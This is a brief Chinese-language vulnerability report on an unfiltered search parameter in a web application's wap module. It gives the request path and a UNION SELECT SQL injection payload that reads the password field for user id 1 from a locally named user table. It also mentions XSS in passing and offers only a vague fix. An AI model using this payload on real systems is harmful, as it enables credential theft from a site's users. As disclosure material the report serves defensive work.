xss那就不用说了
wap模块的搜索没有对关键字过滤涛涛电脑知识网
知道表名即可估计涛涛电脑知识网
好在我不知道官网的表名。只有本地测试了
========/index.php?app=wap&mod=Index&act=doSearch
关键字输入
1' and 1=2 union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cqq_user where uid=1 and 1='1
cqq_user为我本地测试的表名。
修复方案:
各种过滤 各种复查代码 会死人的